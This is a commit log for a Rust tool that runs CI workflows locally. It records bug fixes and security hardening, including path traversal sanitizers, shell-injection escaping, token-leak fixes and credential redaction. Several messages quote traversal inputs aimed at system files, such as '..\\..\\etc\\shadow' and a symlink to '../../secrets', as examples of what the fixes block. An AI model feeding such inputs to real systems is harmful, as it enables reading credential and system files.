add a MockContainerRuntime and four integration tests that exercise the NativeDocker execute_step path end-to-end: entrypoint passthrough, with.args override + INPUT_* injection, empty args, and step/job env propagation. This path previously had zero test coverage for the runtime flow. * fix(executor): deduplicate build context walker, harden sub_path, add missing tests The build_image_inner code in docker.rs had two near-identical ~50-line walker loops — one for when .dockerignore exists and one for when it doesn't. The *only* difference was a single add_custom_ignore_filename() call on the builder. Copy-paste like that drifts. Let's not. Merged into a single loop with a conditional on the WalkBuilder before iteration. Same behavior, half the code. While at it, sanitize_sub_path now splits on both '/' and '\' so a Windows-style traversal like "a\..\..\etc" doesn't sneak past the check. Also expanded the PreparedAction::Image doc comment to explain which code paths still produce it and why it's distinct from NativeDocker — future contributors shouldn't have to guess. Added tests for: unmatched-quote error path in with.args, with.args overriding runs.args, and backslash path traversal in sub_path. * fix(executor): close backslash traversal gap and add with.entrypoint override It turns out that sanitize_dockerfile_rel was only splitting on '/' to catch ".." traversal, while its sibling sanitize_sub_path was correctly splitting on both '/' and '\\'. So a crafted Dockerfile path like "..\\..\\etc\\shadow" would sail right past the sanitizer. The canonicalize() defense-in-depth below *would* catch this in practice, but relying on one security layer to cover a hole in another is not great. Let's just make them consistent. While at it, the NativeDocker execution path was missing support for with.entrypoint — a documented GitHub Actions feature that lets workflow steps override the Docker container's ENTRYPOINT. We were already handling with.args but silently ignoring with.entrypoint, which is the kind of asymmetry that bites you the moment someone actually tries to use it. * fix(executor): close composite sub_path symlink hole and filter empty entrypoint The DockerBuild handler had a proper canonicalize + starts_with defense-in-depth check after resolving sub_path, but the composite action handler just blindly trusted sanitize_sub_path() and called repo_dir.join(p) without verifying the result stayed inside the cloned repo. A symlink named "legit" pointing to "../../secrets" would sail right through the string-only sanitizer. That is not great. Add the same canonicalize + starts_with check to the composite action path so both handlers have identical protection. While at it, filter empty-string entrypoint values to None in both extract_docker_runs_config and the Docker runtime layer. An empty runs.entrypoint in action.yml should mean "use the image default", not "tell Docker to clear the entrypoint" — which is what passing Some("") actually does. Added tests for both the with.entrypoint override path and the empty entrypoint filtering. * fix(executor): filter empty podman entrypoint and extract NativeDocker step handler The podman runtime was happily passing `--entrypoint ""` to podman when a workflow set `with.entrypoint: ""`, while Docker correctly filtered it out via `.filter(|s| !s.is_empty())`. So the two runtimes silently diverged on empty entrypoint behavior. Not great. Add the same filter to podman's entrypoint handling so both runtimes treat empty strings as "use the image default." While at it, extract the ~90-line NativeDocker match arm from execute_step into its own `execute_native_docker_step` function. That match block was getting unwieldy, and this keeps each action type's execution logic self-contained. Also drop a TODO on the in-memory tar buffer in build_image_inner — it holds the entire build context in a Vec<u8>, which gets uncomfortable as repos approach the 500 MB cap. |
||
|
|
8a8d7e5eec |
fix: resolve correctness, security, and parsing bugs across codebase (#73)
* fix: resolve 10 bugs found during full codebase review
- Fix memory leak from Box::leak() in status bar render loop
- Fix AES-GCM nonce reuse vulnerability in encrypted secret storage
- Fix Default impl for EncryptedSecretStore that discarded encryption key
- Fix early return in list command that prevented GitLab pipeline listing
- Fix double validation call in validate_github_workflow
- Wire --show-action-messages CLI flag through ExecutionConfig
- Add serde(rename = "if") to GitLab Rule if_ field for correct deserialization
- Fix potential panic on multibyte paths in workflow tab path shortening
- Include involved job names in circular dependency error messages
- Improve cron syntax validation to check value ranges, steps, and expressions
* fix: address PR review feedback
- Remove dead `_nonce` parameter from `EncryptedSecretStore::from_data`
- Add clarifying comment for inverted show/hide action messages mapping
- Add comprehensive cron validation tests (valid expressions, out-of-range
values, wrong part count, invalid steps, invalid ranges, edge cases)
* fix: resolve 27 bugs found during full codebase verification
A thorough manual verification of every feature uncovered a
*remarkable* collection of bugs hiding in plain sight. The
highlights:
The `strategy.matrix` YAML structure was never parsed. The Job
struct had `matrix` at the top level, but GitHub Actions nests it
under `strategy.matrix`. Serde silently ignored the `strategy`
key, so matrix expansion code existed but could never run. For
absolutely no reason. Introduce a proper `Strategy` struct and
wire it through the executor.
The Step struct was missing `if`, `id`, `working-directory`,
`shell`, and `timeout-minutes` fields. Step-level conditionals
were silently dropped — every step always ran regardless of its
`if` condition. While at it, `continue-on-error` was in the
struct but had no serde rename and was never checked during
execution. Fix all of that.
The validator cheerfully reported cyclic `needs` dependencies as
"Valid". Add DFS cycle detection so `A -> B -> C -> A` is caught
at validation time instead of blowing up at execution time.
Five of eight GitLab CI test fixtures failed to parse because the
model was too rigid: `extends` only accepted arrays (not strings),
`variables` rejected integers, `cache.key` rejected structured
formats, and `script` rejected single strings. Add custom
deserializers following the existing codebase pattern.
The GitHub trigger function leaked the auth token via curl process
arguments visible in `/proc/[pid]/cmdline`. Replace with reqwest,
matching the pattern already used elsewhere. Also add symlink and
path traversal protections in the executor.
Other fixes: hardcoded matrix variable stripping replaced with
proper substitution, `show_action_messages` wired through TUI,
dead `if true {}` removed, default branch detection uses remote
HEAD instead of current branch, cron validator accepts named
days/months, reusable workflow ref validation loosened from OR
to AND, matrix include entries merge into all matching combos.
* fix: harden step-level evaluation, volume checks, and add tests
The PR review turned up a few things that needed fixing before this
was actually ready.
The step-level `if` condition evaluator was silently reusing the
job-level `evaluate_job_condition` function, which knows nothing
about step-scoped expressions like `steps.<id>.outcome`, `success()`,
`failure()`, `always()`, or `cancelled()`. These would fall through
to the generic "unknown condition" path without so much as a warning.
Now they're detected early, a warning is logged, and they default to
true — which is at least *honest* about the limitation.
The volume path traversal check (`..`) was applied to the entire
volume spec string, meaning a perfectly legitimate container path
like `/safe/host:/container/..weird` would get rejected. The check
now only inspects the host path component after splitting on `:`,
which is the part that actually matters for traversal attacks.
While at it, renamed the awkwardly-named `step_name_for_skip` to
just `step_name` in `execute_matrix_job` for consistency with
`execute_job`, and added a BREAKING_CHANGES.md documenting the
EncryptedSecretStore serialization format change.
Added 19 new tests covering matrix include/exclude merge semantics,
step condition evaluation for unsupported expressions, volume path
traversal edge cases, and continue-on-error + step-level if parsing.
* fix: correct condition defaults, path traversal check, and null variable handling
The previous commit defaulted *all* unsupported step-level
condition functions (failure(), cancelled(), always(), success())
to true. It turns out that defaulting failure() and cancelled()
to true is semantically wrong — it means steps guarded by
`if: failure()` will *always* run, even when nothing failed.
That's not a feature, that's a bug.
Default each function to its most likely state: always() and
success() return true, failure() and cancelled() return false.
Not perfect (we still can't track actual step outcomes), but at
least we're not silently running cleanup steps on every build.
The path traversal check was using `contains("..")` which is a
substring match. A directory literally named `..hidden` would
get rejected. Use Path::components() to detect actual ParentDir
components instead of playing string matching games.
While at it, fix deserialize_variables in the GitLab models to
handle YAML null values as empty strings instead of producing
"~\n". Also trim the catch-all serialization output.
* fix: correct cycle detection, condition evaluation, and matrix continue-on-error
The DFS cycle detector in `dfs_detect_cycle` had a genuinely nasty bug:
when a cycle was found, it returned early *without popping itself from
rec_stack*. This left stale entries that corrupted the stack for
subsequent DFS traversals. Net result: cross-edges to already-visited
nodes would be falsely reported as cycles. A→B→A is a cycle, but
D→E→A is just a cross-edge. The old code couldn't tell the difference.
Fix this properly by introducing a separate `in_stack` HashSet for O(1)
membership checks, while keeping the Vec for path reconstruction. Both
are now correctly cleaned up — no early returns skip the cleanup.
While at it, `execute_matrix_job` was silently ignoring `continue-on-error`
on the Err branch. The non-matrix `execute_job` handled it correctly,
but the matrix path would just abort the entire job. Copy-paste bugs
are fun like that. Let's fix that.
The `evaluate_job_condition` status function handling was doing sequential
`contains()` checks with early returns, which meant compound expressions
like `failure() || success()` would match `failure()` first and return
false. Now we scan for all status functions in one pass and pick the
most permissive default when positive functions are present.
Also: `convert_yaml_to_step` was hardcoding `None` for `if_condition`,
`id`, `working_directory`, `shell`, and `timeout_minutes` despite the
YAML potentially having them. And `is_valid_cron_atom` was rejecting
valid POSIX cron syntax like `5/2`.
* refactor(executor): extract step guards into shared helper, fix steps.* default
The step-level if-condition check and continue-on-error handling was
copy-pasted between execute_job and execute_matrix_job with subtly
different control flow — one sets job_success=false and breaks, the
other returns Ok(JobResult{Failure}) immediately. Two copies of the
same logic that *already* disagree is not redundancy, it's a bug
waiting to happen. Let's fix that.
Extract run_step_with_guards() that encapsulates the if-condition
evaluation, execute_step call, and continue-on-error wrapping into
a single StepOutcome enum. Both job execution paths now call this
shared helper.
While at it, fix the condition evaluator defaulting bare steps.*
references to true — "steps.build.outcome == 'failure'" should
*not* optimistically run the step. Now only always() and success()
default to true; everything else (bare step refs, failure(),
cancelled()) conservatively defaults to false.
Also add serde alias "matrix" on Job.strategy so old workflows with
flat matrix: at job level still parse, and document the intentional
or_insert_with in matrix include merging per GitHub Actions spec.
* fix: clean up review findings in step guards, secret store, and test fixture
The PR review flagged three issues worth fixing before merge.
First, run_step_with_guards had a bogus StepStatus::Skipped check
in the abort_job logic. The condition tested for Failure *or*
Skipped, then only actually aborted on Failure — meaning the
Skipped branch did nothing except confuse anyone reading the code.
Simplify to just check Failure directly.
Second, EncryptedSecretStore::from_json would silently fail with a
generic serde error when fed the old serialization format (which
had a shared top-level nonce field). Now it detects the old format
by checking for the "nonce" key and returns a clear error pointing
at BREAKING_CHANGES.md. Added a test for this.
Third, tests/workflows/continue-on-error-test.yml was an orphan
fixture — nothing referenced it. The same content is already
tested inline by parse_continue_on_error_workflow in the parser.
Removed it.
* fix: correct cron day-of-week range, steps. false positive, and Step boilerplate
Three issues from PR review, all straightforward:
The cron validator was rejecting day-of-week value 7, which is a
perfectly valid Sunday alias in both POSIX cron and GitHub Actions.
The max was 6 when it should be 7. The named-value resolver guard
also needed updating from `max == 6` to `max >= 6` so named days
still resolve correctly with the wider range.
The `evaluate_job_condition` heuristic for detecting `steps.*`
references was using a bare `contains("steps.")`, which means an
env var like `env.MY_STEPS_COUNT` would falsely trigger it and
short-circuit to false. Now we check that the character before
"steps." is either start-of-string or non-alphanumeric. Not a
full expression parser, but it stops the obvious false positives.
While at it, add a `Step::with_run` constructor so the GitLab
converter doesn't need three identical 12-field struct literals
that silently break every time someone adds a field to Step.
* fix: harden steps. boundary check, document condition semantics, dedup cycles
The steps. word-boundary heuristic in evaluate_job_condition was
checking for alphanumeric characters before "steps." to avoid false
positives on env vars like "env.MY_STEPS_COUNT". It turns out that
underscore is *not* alphanumeric, so "env._STEPS_CHECK" would
incorrectly trigger the step-reference path and return false.
While at it, the always() && failure() compound expression returning
true got a proper comment explaining *why* that's intentional — we
lack step-status context locally, so we'd rather over-run than
silently skip steps. Not ideal, but honest.
The DFS cycle detector in detect_cyclic_needs could report the same
cycle multiple times depending on HashMap iteration order. Normalize
cycles by rotating the node list to start at the lexicographically
smallest node, then deduplicate via a HashSet. Same cycle from
different entry points now gets reported exactly once.
* fix: squash review nits — double parse, clippy warnings, lost flag
Three leftover issues from the codebase review PR:
The from_json() deserialization was parsing the JSON *twice* — once
into serde_json::Value to sniff for the old nonce field, then again
from the raw string into the actual struct. Parse once, use
from_value() on the already-parsed Value. Not rocket science.
The cycle detector had two clippy warnings: .iter().cloned().collect()
on a slice (just use .to_vec(), please) and .min_by_key() cloning a
double reference instead of comparing properly. Switch to .min_by()
with an explicit cmp.
The show_action_messages flag was being silently dropped in
execute_workflow_cli — hardcoded to false regardless of what the user
asked for. Propagate it through the function signature and the TUI
fallback path so it actually does something.
|
||
|
|
219c27097f |
Merge pull request #72 from bahdotsh/fix/module-review-bugs
fix: correct multiple bugs found during full codebase review |
||
|
|
b49276a026 |
fix: stop hard-exiting on unreadable directory and add #[must_use] to ContainerOutput
The validate subcommand was calling std::process::exit(1) when a directory couldn't be read, which is a rather aggressive response to a permission error. Especially when the code four lines above handles a *missing* path by setting validation_failed and moving on to the next one. Consistency is nice. Let's have some. Split the match from the method chain (because continue is a statement, not an expression, and Rust has opinions about that) and replaced the exit(1) with the same continue pattern. While at it, slap #[must_use] on ContainerOutput so the compiler will yell at anyone who discards a run_container result without checking exit_code. All current callers already bind it, so this is purely forward-looking — but the kind of bug it prevents is the silent-misexecution kind, and those are nobody's favorite. |
||
|
|
422a035c40 |
test: add tests for review fixes and clean up dead code
The previous commit fixed a bunch of bugs but left a few loose ends. The next_job() function still had a redundant bounds check that previous_job() already had cleaned up — the .filter() call makes the inner `if workflow_idx >= self.workflows.len()` dead code. Let's not leave half-finished refactors lying around. While at it, add tests for the three behavioral changes that *really* should have had tests from the start: emulation runtime returning Ok on non-zero exit codes, log processor not panicking on multi-byte UTF-8 near bracket boundaries, and step validator correctly rejecting steps with only a name field. Also fix formatting (cargo fmt) and a clippy warning about items defined after the test module. |
||
|
|
aa3366a797 |
fix: correct multiple bugs found during full codebase review
It turns out that build_image_inner() in docker.rs was calling .elapsed() on a SystemTime to compute the tar mtime. That gives you "seconds since modification" — which is *not* what mtime means. Mtime is seconds since the Unix epoch. The fix is .duration_since(UNIX_EPOCH) like a normal person would use. While at it, the docker logs() call was passing None for options, which means it wasn't actually requesting stdout or stderr. So we were collecting logs from a stream that might not have any. Explicitly set stdout: true and stderr: true. The emulation runtime had a fun behavioral mismatch with Docker and Podman: it returned Err on non-zero exit codes, swallowing all stdout/stderr output. Docker and Podman return Ok with the exit code and let the caller decide what to do. The engine already handles non-zero exit codes in the Ok path, so the emulation was just silently eating useful output for no reason. The UI had a bounds check in next_job() that was mysteriously absent from previous_job() — the kind of inconsistency that waits patiently for someone to hit a stale workflow index and get a panic. Added the same .filter() guard. String slicing in the log processor wasn't checking char boundaries, which is fine until someone's log contains a multi-byte UTF-8 character before a bracket. Added is_char_boundary() checks. Step validation was accepting steps with only a 'name' field and no 'uses' or 'run', which is not a valid step in GitHub Actions. Fixed the validation to require at least one of the two fields that actually *do* something. Replaced .expect() calls on directory reads in main.rs with proper error handling. Panicking because a directory isn't readable is not great user experience. |
||
|
|
debd89b8c6 |
Merge pull request #71 from bahdotsh/fix/58-support-job-container-directive
fix(executor): support job-level container directive |
||
|
|
3296ad1f62 |
fix(executor): guard against empty container image and volume paths
It turns out that if someone writes `container:` with an empty image
string, we'd happily pass "" to Docker and let it figure out what
that means. Spoiler: it doesn't.
Similarly, volume specs like "/host:" or ":/container" would produce
a PathBuf::from("") mount, which is the kind of thing that makes
container runtimes *very* unhappy. Let's just skip those with a
warning instead of pretending they're valid.
While at it, replace the derived Serialize on ContainerCredentials
with a custom impl that redacts the password field. The Debug impl
was already doing this, but serde_json::to_string was still happily
dumping passwords in plaintext. Please don't do that.
|
||
|
|
2c2a633e0e |
fix(executor): harden container config against credential leaks and empty volumes
ContainerCredentials had a derived Debug impl that would happily dump passwords into logs, panic output, and anywhere else Debug gets called. That's *exactly* the kind of thing that bites you at 3am when someone adds a debug trace and suddenly credentials show up in plaintext in your log aggregator. Replace the derived Debug with a manual impl that redacts the password field. While at it, add a guard for empty volume specs that would otherwise produce undefined Docker behavior, a note about the splitn limitation with Windows paths, and fix clippy warnings on the test assertions. |
||
|
|
e76f723034 |
fix(executor): fix phantom env paths and silent volume option drop
The remap_env_file closure had a fallback that would *invent* paths like /github/workflow/github_output when the corresponding env key didn't actually exist in job_env. Those paths point to nothing on the mounted volume, so any step that tries to write to them gets a lovely surprise. Only remap keys that actually exist in job_env now. If GITHUB_OUTPUT isn't set, we don't pretend it is. While at it, volume mount options like :ro and :rw were being silently stripped with no warning. A user specifying :ro expects a read-only mount — silently giving them read-write is not great. Emit a warning when we drop mount options, matching the existing pattern in warn_unsupported_container_fields. Add tests for both fixes plus container env precedence coverage. |
||
|
|
2e1452d237 |
fix(executor): fix volume parsing and hardcoded env path remapping
The volume spec parser was using splitn(2, ':'), which means a Docker volume like "/host:/container:ro" would produce a container path of "/container:ro". That's not a path, that's a path with garbage appended. splitn(3, ':') strips the options correctly. The env path remapping was hardcoding filenames like "/github/workflow/env" instead of deriving them from the actual host paths. If environment.rs ever renames those files, the remapping silently breaks and you get to debug phantom container failures. Derive the filename from the real path instead. While at it, add unit tests for prepare_container_mounts and get_effective_runner_image — the two core functions from the container directive work that had zero test coverage. Nine tests covering Docker/Podman remapping, volume parsing (host:container, single-path, :ro/:rw options), and the image selection fallback. |
||
|
|
ecb9392d52 |
refactor(executor): deduplicate container mount logic and fix review issues
The container directive support in
|
||
|
|
2eae320953 |
fix(executor): support job-level container directive
It turns out that the Job struct in the parser had *no* container
field at all. When a workflow specified `container: alpine:3.22.1`,
serde silently dropped it, and the engine happily derived the runner
image from `runs-on` instead. So `apk add` runs inside Ubuntu.
Confusion ensues.
Add a JobContainer type with a custom deserializer that handles both
the string form (`container: alpine:3.22.1`) and the object form
(`container: { image: ..., env: ..., volumes: ... }`). A new
get_effective_runner_image() prefers the container image over the
runs-on mapping.
While at it, fix the GITHUB_ENV volume mounting for real container
runtimes. The old code identity-mounted the host temp path into the
container, which breaks on macOS with Podman because /var/folders
doesn't exist in the VM. Now we mount the github env directory at
/github/workflow/ and remap the env vars to match.
Container-level env vars and volumes are also wired through with
correct precedence (step > job > container).
Closes #58
|
||
|
|
39006fd232 |
Merge pull request #70 from bahdotsh/fix/48-resolve-action-yml-for-docker-image
fix: resolve action.yml from remote repos to determine correct Docker image |
||
|
|
c21182d389 |
fix(executor): handle sub-path action refs and stop mutating env in tests
It turns out that action references like `github/codeql-action/init@v3` were being treated as if `github/codeql-action/init` was the repo name. The resolver would then try to fetch action.yml from `github/codeql-action/init/v3/action.yml` instead of the correct `github/codeql-action/v3/init/action.yml`. Same bug hit shallow_clone — it would try to clone a repo URL with the sub-path baked in, which obviously doesn't exist. Add a `sub_path` field to `ActionInfo` so `resolve_action` splits `owner/repo/path@ref` into its actual components. The resolver, cache key, and composite action clone all use the sub-path correctly now. While at it, stop using `std::env::set_var`/`remove_var` in the wiremock tests. Those are unsound in multi-threaded test binaries (Rust 1.83+ rightly marks them unsafe). Refactored `fetch_and_parse` to accept the token as a parameter — the tests just pass it directly, no env mutation needed. |
||
|
|
8661771b8a |
fix(executor): fix shell injection, env var leak in tests, and missing docs
Three issues from code review, all small but all real:
The echo fallback in execute_step was interpolating the `uses` string
directly into a single-quoted sh -c argument. A workflow with a
single quote in the action ref would break out of the shell string.
Escape single quotes with the standard '\'' pattern.
The fetch_and_parse tests were calling env::remove_var("GITHUB_TOKEN")
and env::set_var() without saving and restoring the original value.
If GITHUB_TOKEN was set before the test suite ran, it would be
permanently wiped for subsequent tests. All three tests now
save/restore properly.
While at it, document the ActionInfo::version field semantics —
it's empty for docker/local refs, holds the git ref for GitHub
action refs, and defaults to "main" when omitted. Future readers
shouldn't have to guess.
|
||
|
|
f53a45e25d |
fix(executor): fix docker digest parsing, token leak in redirects, and missing tests
It turns out that resolve_action was blindly splitting on '@' for *all* action references, including Docker image refs like docker://alpine@sha256:abc123. The '@' in a Docker digest is not a version separator — it's part of the image reference. Splitting it produces a nonsensical repository and a fake "version" that happens to be a SHA256 digest. Nobody noticed because the Docker path doesn't use the version field, but the parsed data was still wrong. While at it, the auth retry path in fetch_and_parse was constructing a brand new reqwest::Client on every single 404-then-retry cycle. That means a fresh TLS handshake each time, which is wasteful when we already have a perfectly good static client pattern. Promote the no-redirect client to a static Lazy, same as HTTP_CLIENT. The auth redirect flow — where we send GITHUB_TOKEN to the origin but strip it before following a redirect to a CDN — had zero test coverage. This is the kind of security invariant that *really* should not depend on code review alone. Add wiremock-based tests that verify the token does not leak to redirect targets, plus tests for the basic auth retry and 404 paths. Parameterize fetch_and_parse with a base_url so wiremock can intercept the requests. |
||
|
|
9bdf24f86b |
fix(executor): fix review issues in action resolver and engine
The PR review flagged three things that deserved fixing: The action resolver was silently swallowing the *first* error when action.yml failed and then retrying action.yaml. If action.yml existed but had a parse error, you'd never know — it just quietly tried the other filename. Now both error messages are combined so you actually get useful diagnostics. There was a stale comment in engine.rs that read "rest of the existing code for handling regular actions" — which was left over from the refactor and described absolutely nothing. Gone. The SHA detection logic in shallow_clone was inline and untested. Extract it into is_git_sha() and add proper tests covering valid SHA-1, short hashes, branch names, tags, non-hex input, and off-by-one lengths. |
||
|
|
ce3099d757 |
fix(executor): add User-Agent header and handle auth redirects properly
The action resolver was making HTTP requests to raw.githubusercontent.com with no User-Agent header, which is the kind of thing that gets you silently rate-limited by GitHub's CDN. Not great when your whole resolution strategy depends on those requests actually succeeding. While at it, the no-redirect policy on the authenticated retry path was *correct* for preventing token leakage to non-GitHub hosts, but it also meant that legitimate CDN redirects (3xx) would fall through to the success check and produce a misleading "HTTP 301 fetching..." error. Fix this by following the redirect with HTTP_CLIENT (no auth header) when we get a 3xx, so we get the content without leaking the token. Also add a note on the SHA-1 detection in shallow_clone — it only matches 40-char hex strings, which will need updating if GitHub ever adopts SHA-256 refs. |
||
|
|
3ee75e6aa8 |
fix(executor): fix dead code, misleading comment, and token leak risk
The exit_code branching in execute_step had a classic nested-condition bug: the cargo-error detail block checked `exit_code != 0` *inside* an `if exit_code == 0` block. That entire error path was unreachable dead code. Confusion ensues. Flatten the branching so the cargo-error path is actually reachable on failure, and the verbose-output construction doesn't gate the entire result. While at it, fix two things in action_resolver: the BoundedCache insert comment said "LRU order" when the eviction strategy is FIFO, and the authenticated retry for private repos was reusing the shared HTTP_CLIENT which follows redirects by default — meaning a hypothetical redirect away from raw.githubusercontent.com would happily forward the GITHUB_TOKEN to wherever it landed. Use a no-redirect client for the authenticated request instead. |
||
|
|
8dd6d1b143 |
fix(executor): correct misleading cache docs, token comment, and docker version semantics
Three issues from code review, all minor but all worth fixing before they confuse someone later. The BoundedCache was documented as "LRU-style" when it's actually plain FIFO — get() doesn't promote keys. Nobody cares for this use case since actions resolve once per run, but calling FIFO "LRU" is the kind of lie that breeds real bugs when someone trusts the docs and adds access-pattern-dependent logic later. Fixed the comments. The 404-retry-with-GITHUB_TOKEN pattern in fetch_and_parse was correct but undocumented — it *only* targets raw.githubusercontent.com so there's no token-to-attacker-host risk, but that's the kind of thing you want a future reader to see immediately without having to trace the URL construction. Added a comment. resolve_action was setting version to "main" for docker:// refs and local paths (./), which is semantically wrong. Docker refs embed their tag in the repository string, and local paths have no version at all. Neither value was ever *used* in those code paths, but a wrong value sitting in a struct field is a bug waiting to happen. Set version to "" for both cases instead. |
||
|
|
de0cf0e419 |
fix(executor): harden action resolver: bounded cache, async clone, strict parsing
The action resolver had a few problems that would bite in production.
The ACTION_CACHE was an unbounded HashMap behind a Mutex — so it
leaked memory indefinitely in long-running processes, and readers
blocked each other for no good reason. Replace it with a bounded
LRU-style cache (256 entries, oldest evicted first) behind an RwLock
so concurrent reads don't serialize.
shallow_clone() was using std::process::Command in async context,
which blocks the tokio runtime thread. For SHA refs that's *three*
sequential blocking operations. Convert the whole thing to
tokio::process::Command. While at it, add `--` before positional
args to prevent flag injection from crafted version strings, and
`--single-branch` to avoid fetching unnecessary refs.
The node version parser silently defaulted to 20 on malformed input
("nodefoo" -> node:20-slim). That's the kind of silent data
corruption that makes debugging a nightmare. Return an error instead.
HTTP timeout reduced from 15s to 5s — this is best-effort with a
fallback, so waiting 30s (two filenames × 15s) on a flaky network
is not helpful. GITHUB_TOKEN is now only sent on 404 retry instead
of unconditionally, because leaking tokens to public repos you don't
own is not great practice.
Also killed a dead conditional where both branches of an
if/else produced identical output.
|
||
|
|
419ccf97d4 |
fix(executor): harden action resolver and kill magic string dispatch
It turns out that prepare_action() was returning the string "composite" as if it were a Docker image name, and then execute_step() was checking `if image == "composite"` to decide the control flow. This is not great. Stringly-typed dispatch hiding inside what *looks* like an image name is the kind of thing that confuses every future contributor. Replace the String return with a proper PreparedAction enum that makes the Composite vs Image distinction explicit at the type level. While at it, fix several other bugs in the action resolver: - git clone --branch doesn't work with SHA refs, and actions pinned to full commit SHAs (a perfectly normal thing to do) would just fail with a confusing git error. Extract a shared shallow_clone() helper that detects SHA refs and uses init+fetch+checkout instead. - DockerBuild actions (ones that bundle their own Dockerfile) were silently falling through to determine_action_image(), which would cheerfully return node:20-slim. Return an explicit error instead of pretending everything is fine. - Failed action.yml fetches were permanently cached as None, so a transient network hiccup would poison the cache for the entire process lifetime. Only cache successes now. - The reusable workflow clone had the same --branch SHA bug; it now uses the shared shallow_clone() helper too. |
||
|
|
639d86ad3b |
fix(executor): handle DockerBuild actions and harden action resolver
The previous commit added remote action.yml resolution, which was a good idea in principle. But it had a *rather significant* problem: when an action declares `runs.image: Dockerfile` (meaning "build my bundled Dockerfile"), the resolver happily returned the literal string "Dockerfile" as the Docker image name. Confusion ensues. Downstream code tries to pull an image called "Dockerfile" from a registry. That doesn't work. Add a DockerBuild variant to ActionType for actions that bundle their own Dockerfile. image_for_action() now returns Option<String> — None for DockerBuild — so the caller falls back to the hardcoded mapping instead of trying to pull nonsense from a registry. While at it, fix several other problems from the initial PR: - Reuse a static reqwest::Client instead of creating one per HTTP request, because TLS initialization on every fetch is wasteful - Capture git clone stderr instead of sending it to /dev/null, so when cloning a remote composite action fails you actually get to know *why* - Add tests for ActionInfo.version parsing in the parser (the field was added but never tested — please don't do that) - Add edge-case tests for DockerBuild, unknown using values, missing fields, and the docker://Dockerfile prefix variant |
||
|
|
f2c6097534 |
fix: resolve action.yml from remote repos to determine correct Docker image
Fixes #48. When encountering third-party GitHub Actions, wrkflw previously defaulted to node:20-slim for all unknown actions. Now it fetches the action's action.yml from raw.githubusercontent.com, parses runs.using to determine the action type (Node/Docker/Composite), and selects the appropriate Docker image. Falls back to the existing hardcoded mapping on any failure. |
||
|
|
05ed4d12b4 |
docs: add AI agent codebase navigation guides
Add CLAUDE.md, AGENTS.md, and INDEX.md — all generated by the indxr MCP tooling to give AI coding assistants a structured way to explore the codebase without dumping entire files into context. CLAUDE.md is the detailed version with token cost estimates and a full tool reference. AGENTS.md is the condensed version. INDEX.md is an auto-generated codebase index with file summaries and symbol maps. While at it, add .indxr-cache/ to .gitignore because nobody needs that in the repo. |
||
|
|
baf6157ab0 |
Merge pull request #69 from sonwr/fix-64-empty-trigger-globs
fix: allow empty trigger glob filters in workflow parser |
||
|
|
b90f07f945 | fix(parser): allow empty trigger glob arrays | ||
|
|
81d8d7ab6d |
Merge pull request #63 from bahdotsh/fix/remote-workflow-tempdir-lifecycle
fix: resolve tempdir lifecycle issue in remote workflow execution |
||
|
|
1d2008852e |
fix: resolve tempdir lifecycle issue in remote workflow execution
- Fix remote workflow execution failing with 'No such file or directory' - Move workflow parsing and execution inside tempdir scope to prevent premature cleanup of temporary directory - Ensure TempDir stays alive during entire remote workflow lifecycle - Remote workflows like pytorch/test-infra/.github/workflows/*.yml@main now execute successfully Resolves #47 |
||
|
|
c707bf8b97 |
Merge pull request #61 from bahdotsh/fix/docker-github-env-volume-mounting
fix(docker): mount GitHub environment files directory into containers |
||
|
|
b1cc74639c | version fix | ||
|
|
f45babc605 |
fix(docker): mount GitHub environment files directory into containers
- Mount GitHub environment files directory containing GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH, and GITHUB_STEP_SUMMARY - Resolves Docker container exit code -1 when writing to $GITHUB_ENV - Update volume mapping in both step execution contexts in engine.rs - Tested on macOS with Docker Desktop Closes: Issue where echo "VAR=value" >> "$GITHUB_ENV" fails in Docker runtime |
||
|
|
7970e6ad7d |
Release 0.7.3
wrkflw@0.7.3 wrkflw-evaluator@0.7.3 wrkflw-executor@0.7.3 wrkflw-github@0.7.3 wrkflw-gitlab@0.7.3 wrkflw-logging@0.7.3 wrkflw-matrix@0.7.3 wrkflw-parser@0.7.3 wrkflw-runtime@0.7.3 wrkflw-secrets@0.7.3 wrkflw-ui@0.7.3 wrkflw-utils@0.7.3 wrkflw-validators@0.7.3 Generated by cargo-workspaceswrkflw-secrets@0.7.3 wrkflw-validators@0.7.3 wrkflw-utils@0.7.3 wrkflw-ui@0.7.3 wrkflw-gitlab@0.7.3 wrkflw-logging@0.7.3 wrkflw-matrix@0.7.3 wrkflw-parser@0.7.3 wrkflw-runtime@0.7.3 v0.7.3 wrkflw-github@0.7.3 wrkflw-executor@0.7.3 wrkflw-evaluator@0.7.3 wrkflw@0.7.3 |
||
|
|
51a655f07b | version fixes | ||
|
|
7ac18f3715 |
Release 0.7.2
wrkflw-runtime@0.7.2 wrkflw-utils@0.7.2 Generated by cargo-workspacesv0.7.2 wrkflw-runtime@0.7.2 wrkflw-utils@0.7.2 |
||
|
|
1f3fee7373 |
Merge pull request #56 from bahdotsh/fix/windows-compatibility
fix(utils): add Windows support to fd module |
||
|
|
f49ccd70d9 |
fix(runtime): remove unnecessary borrow in Windows taskkill command
- Fix clippy needless_borrows_for_generic_args warning - Change &pid.to_string() to pid.to_string() for taskkill /PID argument - Ensure clippy passes with -D warnings on Windows builds |
||
|
|
5161882989 |
fix(utils): remove unused imports to fix Windows clippy warnings
- Remove unused io::self import from common scope - Remove unused std::fs::OpenOptions and std::io::Write from windows_impl - Add std::io import to unix_impl to fix io::Error references - Ensure clippy passes with -D warnings on all platforms |
||
|
|
5e9658c885 |
ci: add Windows to build matrix and integration tests
- Add windows-latest to OS matrix with x86_64-pc-windows-msvc target - Add dedicated Windows integration test job - Verify Windows executable functionality - Ensure cross-platform compatibility testing This ensures Windows build issues are caught early in CI/CD pipeline. |
||
|
|
aa9da33b30 |
docs(utils): update README to document cross-platform fd behavior
- Document Unix vs Windows fd redirection limitations - Update example to reflect platform-specific behavior - Clarify that stderr suppression is Unix-only |
||
|
|
dff3697052 |
fix(utils): add Windows support to fd module
- Add conditional compilation for Unix/Windows platforms - Move nix dependency to Unix-only target dependency - Implement Windows-compatible fd redirection API - Preserve full functionality on Unix systems - Add comprehensive documentation for platform differences Resolves Windows build errors: - E0433: could not find 'sys' in 'nix' - E0432: unresolved import 'nix::fcntl' - E0433: could not find 'unix' in 'os' - E0432: unresolved import 'nix::unistd' Closes #43 |
||
|
|
5051f71b8b |
Release 0.7.1
